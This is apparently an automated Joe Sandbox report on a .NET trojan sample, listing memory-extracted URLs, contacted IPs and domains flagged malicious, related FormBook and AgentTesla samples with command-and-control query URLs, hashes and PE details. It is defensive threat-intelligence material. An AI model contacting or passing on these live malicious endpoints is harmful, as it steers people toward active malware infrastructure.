https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.jupitr-claim.top/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mingshengglass.com/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yoursweets.online/vr01/www.ethicai.pro	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.erabits.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.oregonjobs.co/vr01/www.helyibudapest.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.poseidoncrm.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nicolbauer.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000006.00000002.3838517721.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3831292378.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1358564152.0000000007670000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.poseidoncrm.com/vr01/www.yesxoit.xyz	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://parade.com/61481/toriavey/where-did-hamburgers-originate	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.yoursweets.online/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mayorii.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.erabits.comReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.molobeverello.comReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.molobeverello.com/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/~T	explorer.exe, 00000006.00000002.3838977700.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008796000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.elcaporalburley.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bombslot-42.co/vr01/	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al	explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.kidscircle.shop	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.helyibudapest.com	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bombslot-42.coReferer:	explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.owletbaby.shop	United States	16509	AMAZON-02US	true
172.67.154.171	www.helyibudapest.com	United States	13335	CLOUDFLARENETUS	true
102.134.40.151	www.mingshengglass.com	South Africa	328543	sun-asnSC	true
3.33.130.190	ethicai.pro	United States	8987	AMAZONEXPANSIONGB	true
104.21.56.10	www.bombslot-42.co	United States	13335	CLOUDFLARENETUS	true
66.147.240.91	oregonjobs.co	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1422327
Start date and time:	2024-04-08 15:21:33 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hj3YCvtlg7.exe renamed because original name is a hash value
Original Sample Name:	4850a766fab45d5947075658d9c6bbf4b970f0d05b082c1472b93d9a7fa3d093.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/1@11/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 98 Number of non-executed functions: 312
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:22:23	API Interceptor	1x Sleep call for process: hj3YCvtlg7.exe modified
15:22:32	API Interceptor	8090201x Sleep call for process: explorer.exe modified
15:23:09	API Interceptor	7507519x Sleep call for process: ipconfig.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	Purchase Order#44231.exe	Get hash	malicious	FormBook	Browse	www.owletbaby.shop/vr01/?DVo0=YlUPPT_xC8f&tXR=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL
	5AmzSYESuY.exe	Get hash	malicious	FormBook	Browse	www.timeis.shop/kh11/?sp=zhUfYloIFn33K9lN+ZdwjaCZo5UNKS20khOYsMHkuhRQ0nfgX4+kvc+XCvr0I1Fv9DqK&SP=cnxh5xAH
	Purchase Order#23113.exe	Get hash	malicious	FormBook	Browse	www.owletbaby.shop/vr01/?YN9P-lUP=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL&Vr=L4nHMf5x
	Quotation approved 02887.exe	Get hash	malicious	FormBook	Browse	www.kidscircle.shop/vr01/?W6=PLKcE8wdvB3+u+s+4uL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pzqSZumme1A/&TlPt=JVlpdVvpc05H2Z
	KY9D34Qh8d.exe	Get hash	malicious	Unknown	Browse	homepagetechnology.com/pma/
	RFQ RT1120 #10324.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.kidscircle.shop/vr01/?vRfX=lhL0WFfxrF_LiLF&CZjpOVd=PLKcE8wdvB3+u+s+4uL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pzqSZumme1A/
	Batteriforeningen.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.promoplace.online/m9so/
	1AIemYSAZy.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	posiklan.com/pma/
	MCYq2AqNU0.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	acidvision.com/admin/
	Documento de confirmacion de orden de compra OC 1580070060.exe	Get hash	malicious	FormBook	Browse	www.gourmetfoodfactory.com/pz08/?mzrPV4R=YXUHyuzV9xL0ASV6xbcNd1qnDMoomLXuS1YqahB0JTuNzOlGIgIKnXH69pHGKPL64RNK&Rl=8pFP0r98Chvt5p5P
172.67.154.171	rove.exe	Get hash	malicious	FormBook	Browse	www.managecache.com/aipc/?3fKPPf=0DXDKK2wjcNL54EYTGIK9OaUDUSfZE1CVqQ9B8J7QyFzsXPs4LQK3N4OF7Nm1nQYp/dJXkRieA==&mX=yDHPRbY05
102.134.40.151	Purchase Order#23113.exe	Get hash	malicious	FormBook	Browse	www.mingshengglass.com/vr01/?YN9P-lUP=p/xcNqyzh27Txsj3CquMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRnhiYBgsx3b&Vr=L4nHMf5x
3.33.130.190	gRDcPJpgMQ.exe	Get hash	malicious	FormBook	Browse	www.ariostech.com/fs83/?F0G=4hOdKx&AZ=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVQJQXKev3+LO
	ZNGMn9IDJX.exe	Get hash	malicious	FormBook	Browse	www.ariostech.com/fs83/?GfFd7pI0=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVT9AHfqpqryJ&Ezu=UXItOX1x-th4
	n3R8WBIjhz.exe	Get hash	malicious	FormBook	Browse	www.cattaillake.com/kh11/?1bwhTVVh=KEhnWm4lQPi3/0+0bbhEs8tCBxxo7fG5PBw2arP0utdd9YcD2Otx3zp3eIuaSGa6B4AW&or=3f5pdRHX
	0wD4IaXvQH.exe	Get hash	malicious	FormBook	Browse	www.cattaillake.com/kh11/?ExlpdH=KEhnWm4lQPi3/0+0bbhEs8tCBxxo7fG5PBw2arP0utdd9YcD2Otx3zp3eIujenm/KPAW&anx=TXFXCVdxMl5ty
	8C3H9zQgK2.exe	Get hash	malicious	FormBook	Browse	www.cattaillake.com/kh11/?9r=KEhnWm4lQPi3/0+0bbhEs8tCBxxo7fG5PBw2arP0utdd9YcD2Otx3zp3eLOFZmaEB4cb&yT=H0GxcDi
	dVebcwR6p0.exe	Get hash	malicious	FormBook	Browse	www.clashfitness.com/fs83/?Txl=O0GPaRWPLnPXX6&NVoluR=0r3jDZR2mPSB2mr946YdutOlopl9YgvkC/gHB3J+dtDrerkWCLnITmSv5p2p041JRVShddibDw==
	3PhhXne1YD.exe	Get hash	malicious	FormBook	Browse	www.clashfitness.com/fs83/?Ur=LjwLdnb8MJ&TL3=0r3jDZR2mPSB2mr946YdutOlopl9YgvkC/gHB3J+dtDrerkWCLnITmSv5p2QrJVKfDOmddicQA==
	SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exe	Get hash	malicious	FormBook	Browse	www.cattaillake.com/kh11/?02M=KEhnWm5RQvnHiEjAHrhEs8tCBxxo7fG5PBw2arP0utdd9YcD2Otx3zp3eLOgCXqEB4AW&EVdL=KndHBxqXqV
	Dokument-99373.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.shufflecasinos.com/he24/?kdIPfJ=LKMyCjCs2Qh4eDCvHdO+U+FB5F1Wyj9u446xeBu85vNw8X1OgelAh9mTo9Rn3ls+LN1u&YnT=ybIXh69866RxC2A
	7WCNP0l65P.exe	Get hash	malicious	FormBook	Browse	www.kinovod130424.pro/ns03/?uPj=6tF5nxHoSxhgYQb3ysy+w6ptEpIBlu7LS2k1HZiSwajY7FhTpvUsXhQKktqSFN/CXP5M&8ps=fjKpuXjHJ

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.bombslot-42.co	Quotation approved 02887.exe	Get hash	malicious	FormBook	Browse	172.67.175.171
www.kidscircle.shop	Quotation approved 02887.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.kidscircle.shop	RFQ RT1120 #10324.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
www.owletbaby.shop	Purchase Order#44231.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.owletbaby.shop	Purchase Order#23113.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.mingshengglass.com	Purchase Order#23113.exe	Get hash	malicious	FormBook	Browse	102.134.40.151

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZONEXPANSIONGB	http://56hytuti5.weebly.com	Get hash	malicious	Unknown	Browse	52.223.40.198
	test.exe	Get hash	malicious	Globeimposter	Browse	3.33.143.57
	gRDcPJpgMQ.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	ZNGMn9IDJX.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	n3R8WBIjhz.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	0wD4IaXvQH.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	8C3H9zQgK2.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	dVebcwR6p0.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	3PhhXne1YD.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
CLOUDFLARENETUS	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	2iRj6Q8fkh.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	P3DuNLpu72.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	oi89NcmKFP.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ZaDKpv94O0.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	a9wJzPSyH4.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://56hytuti5.weebly.com	Get hash	malicious	Unknown	Browse	162.159.136.66
	https://wix-l.in/k-T3DnGkZk	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://777qiuqiu.online/LOVEYOU/	Get hash	malicious	Unknown	Browse	172.67.158.60
	f4CdNDrJp8.exe	Get hash	malicious	FormBook	Browse	172.67.152.117
AMAZON-02US	http://56hytuti5.weebly.com	Get hash	malicious	Unknown	Browse	13.226.52.56
	TAuYRfTT6D.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	http://midjourney.co	Get hash	malicious	Unknown	Browse	18.220.225.157
	http://midjourney.co	Get hash	malicious	Unknown	Browse	13.226.52.60
	Purchase Order#44231.exe	Get hash	malicious	FormBook	Browse	76.223.105.230
	t42HNtzR7u.elf	Get hash	malicious	Gafgyt, Mirai	Browse	34.249.145.219
	WDJ81X46o0.elf	Get hash	malicious	Gafgyt, Mirai	Browse	54.247.62.1
	qH7cct0GBg.elf	Get hash	malicious	Gafgyt, Mirai	Browse	34.249.145.219
	https://45spahf7zbogxk0h.umso.co/	Get hash	malicious	Unknown	Browse	35.167.83.247
	https://mirror-rounded-tachometer.glitch.me/?mail=rp@emfa.pt	Get hash	malicious	Unknown	Browse	108.156.83.121
sun-asnSC	Purchase Order#23113.exe	Get hash	malicious	FormBook	Browse	102.134.40.151
	43ZYohKtbk.elf	Get hash	malicious	Mirai	Browse	45.221.118.203
	PROJECT-_SAUDI_ARAMCO_DRAWING_AND_SPECS.vbs	Get hash	malicious	FormBook	Browse	45.221.114.42
	2022-571-GLS.exe	Get hash	malicious	FormBook	Browse	45.221.114.43
	Swift.exe	Get hash	malicious	FormBook	Browse	45.221.114.43
	bk.mpsl-20220930-0404.elf	Get hash	malicious	Mirai	Browse	102.134.57.97
	v22-003920.exe	Get hash	malicious	FormBook, GuLoader	Browse	45.221.109.201
	EtAT4sBTxb	Get hash	malicious	Mirai	Browse	45.221.118.202
	arm-20220318-0536	Get hash	malicious	Mirai Moobot	Browse	45.221.118.204
	Payment Copy.exe	Get hash	malicious	FormBook	Browse	102.134.51.19
CLOUDFLARENETUS	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	2iRj6Q8fkh.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	P3DuNLpu72.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	oi89NcmKFP.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ZaDKpv94O0.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	a9wJzPSyH4.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://56hytuti5.weebly.com	Get hash	malicious	Unknown	Browse	162.159.136.66
	https://wix-l.in/k-T3DnGkZk	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://777qiuqiu.online/LOVEYOU/	Get hash	malicious	Unknown	Browse	172.67.158.60
	f4CdNDrJp8.exe	Get hash	malicious	FormBook	Browse	172.67.152.117

Process:	C:\Users\user\Desktop\hj3YCvtlg7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.85858194090088
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	hj3YCvtlg7.exe
File size:	670'728 bytes
MD5:	dad6e1001c72b68d690fedf88254f157
SHA1:	8304a2d91515ca2f1079f787de0b8a776941c2cd
SHA256:	4850a766fab45d5947075658d9c6bbf4b970f0d05b082c1472b93d9a7fa3d093
SHA512:	dc0d32fbb19436da3e0ad1930265e30037ec3b5da60b902c96bb1e052f1d9f6adc698753c6fe88a4a2a440262870dd30e2393ac9f5f8cbe1ced55caacf3faf9f
SSDEEP:	12288:d0ThCmCKGvGOfdY/IDuwEtSR5l6odUBJiJuh527BOsVFkR:WTULGOfdUIDk8nk8UBJiJO5ABtV4
TLSH:	A7E4010267E86B08F87BA7F4B550411023727517BAB6D79C6FD0E0CE2AB1B414E6B71B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....z...............0.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4a181a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9D7A1105 [Sat Sep 20 23:11:01 2053 UTC]
TLS Callbacks:
CLR (.Net) Version:
